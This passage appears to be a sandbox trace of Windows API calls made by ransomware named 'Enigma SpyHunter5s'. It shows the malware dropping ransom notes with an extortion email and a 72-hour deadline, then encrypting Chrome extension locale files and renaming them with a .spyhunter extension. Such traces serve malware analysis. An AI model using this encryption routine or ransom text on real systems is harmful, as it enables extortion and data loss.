"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\messages.json.spyhunter")) returned 1 [0159.055] GetProcessHeap () returned 0x2c0000 [0159.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.055] GetProcessHeap () returned 0x2c0000 [0159.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.055] GetProcessHeap () returned 0x2c0000 [0159.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f0b0 | out: hHeap=0x2c0000) returned 1 [0159.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.056] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.056] WriteFile (in: hFile=0x178, lpBuffer=0x270e9e3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x270e9e3*, lpNumberOfBytesWritten=0x270eb0c*=0x127, lpOverlapped=0x0) returned 1 [0159.056] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.057] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb0c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb0c*=0x2ac, lpOverlapped=0x0) returned 1 [0159.057] CloseHandle (hObject=0x178) returned 1 [0159.057] GetProcessHeap () returned 0x2c0000 [0159.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1ef28 | out: hHeap=0x2c0000) returned 1 [0159.057] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eaa8 | out: pbBuffer=0x270eaa8) returned 1 [0159.057] GetProcessHeap () returned 0x2c0000 [0159.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.057] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eaa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eaa0*=0x30) returned 1 [0159.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.058] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json") returned 155 [0159.058] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.058] GetProcessHeap () returned 0x2c0000 [0159.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.058] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea64*=0xe8, lpOverlapped=0x0) returned 1 [0159.059] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.059] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x270ea64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea64*=0xe8, lpOverlapped=0x0) returned 1 [0159.059] GetProcessHeap () returned 0x2c0000 [0159.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.059] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.059] WriteFile (in: hFile=0x178, lpBuffer=0x270eaa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea64, lpOverlapped=0x0 | out: lpBuffer=0x270eaa4*, lpNumberOfBytesWritten=0x270ea64*=0x4, lpOverlapped=0x0) returned 1 [0159.059] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea64, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea64*=0x30, lpOverlapped=0x0) returned 1 [0159.059] CloseHandle (hObject=0x178) returned 1 [0159.059] GetProcessHeap () returned 0x2c0000 [0159.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.060] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.spyhunter") returned 165 [0159.060] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\messages.json.spyhunter")) returned 1 [0159.060] GetProcessHeap () returned 0x2c0000 [0159.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.060] GetProcessHeap () returned 0x2c0000 [0159.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.061] GetProcessHeap () returned 0x2c0000 [0159.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1eda0 | out: hHeap=0x2c0000) returned 1 [0159.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.061] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.061] WriteFile (in: hFile=0x178, lpBuffer=0x270e9db*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x270e9db*, lpNumberOfBytesWritten=0x270eb04*=0x127, lpOverlapped=0x0) returned 1 [0159.062] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.062] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb04*=0x2ac, lpOverlapped=0x0) returned 1 [0159.062] CloseHandle (hObject=0x178) returned 1 [0159.062] GetProcessHeap () returned 0x2c0000 [0159.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1ec18 | out: hHeap=0x2c0000) returned 1 [0159.063] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eaa0 | out: pbBuffer=0x270eaa0) returned 1 [0159.063] GetProcessHeap () returned 0x2c0000 [0159.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.063] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea98*=0x30) returned 1 [0159.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json") returned 155 [0159.063] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.063] GetProcessHeap () returned 0x2c0000 [0159.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.063] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea5c*=0x130, lpOverlapped=0x0) returned 1 [0159.064] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.064] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x270ea5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea5c*=0x130, lpOverlapped=0x0) returned 1 [0159.064] GetProcessHeap () returned 0x2c0000 [0159.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.065] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.065] WriteFile (in: hFile=0x178, lpBuffer=0x270ea9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea5c, lpOverlapped=0x0 | out: lpBuffer=0x270ea9c*, lpNumberOfBytesWritten=0x270ea5c*=0x4, lpOverlapped=0x0) returned 1 [0159.065] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea5c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea5c*=0x30, lpOverlapped=0x0) returned 1 [0159.065] CloseHandle (hObject=0x178) returned 1 [0159.065] GetProcessHeap () returned 0x2c0000 [0159.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.065] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.spyhunter") returned 165 [0159.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0159.066] GetProcessHeap () returned 0x2c0000 [0159.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.066] GetProcessHeap () returned 0x2c0000 [0159.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.066] GetProcessHeap () returned 0x2c0000 [0159.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1ea90 | out: hHeap=0x2c0000) returned 1 [0159.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.067] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.067] WriteFile (in: hFile=0x178, lpBuffer=0x270e9d3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x270e9d3*, lpNumberOfBytesWritten=0x270eafc*=0x127, lpOverlapped=0x0) returned 1 [0159.068] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.068] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eafc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eafc*=0x2ac, lpOverlapped=0x0) returned 1 [0159.068] CloseHandle (hObject=0x178) returned 1 [0159.068] GetProcessHeap () returned 0x2c0000 [0159.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e908 | out: hHeap=0x2c0000) returned 1 [0159.068] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea98 | out: pbBuffer=0x270ea98) returned 1 [0159.068] GetProcessHeap () returned 0x2c0000 [0159.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.068] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea90*=0x30) returned 1 [0159.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") returned 155 [0159.069] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.069] GetProcessHeap () returned 0x2c0000 [0159.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.069] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ea54*=0xea, lpOverlapped=0x0) returned 1 [0159.070] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.070] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x270ea54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ea54*=0xea, lpOverlapped=0x0) returned 1 [0159.070] GetProcessHeap () returned 0x2c0000 [0159.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.070] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.070] WriteFile (in: hFile=0x178, lpBuffer=0x270ea94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea54, lpOverlapped=0x0 | out: lpBuffer=0x270ea94*, lpNumberOfBytesWritten=0x270ea54*=0x4, lpOverlapped=0x0) returned 1 [0159.070] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea54, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea54*=0x30, lpOverlapped=0x0) returned 1 [0159.071] CloseHandle (hObject=0x178) returned 1 [0159.071] GetProcessHeap () returned 0x2c0000 [0159.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.071] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.spyhunter") returned 165 [0159.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0159.072] GetProcessHeap () returned 0x2c0000 [0159.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.072] GetProcessHeap () returned 0x2c0000 [0159.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.072] GetProcessHeap () returned 0x2c0000 [0159.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1e780 | out: hHeap=0x2c0000) returned 1 [0159.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.073] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.073] WriteFile (in: hFile=0x178, lpBuffer=0x270e9cb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eaf4, lpOverlapped=0x0 | out: lpBuffer=0x270e9cb*, lpNumberOfBytesWritten=0x270eaf4*=0x127, lpOverlapped=0x0) returned 1 [0159.073] lstrlenA 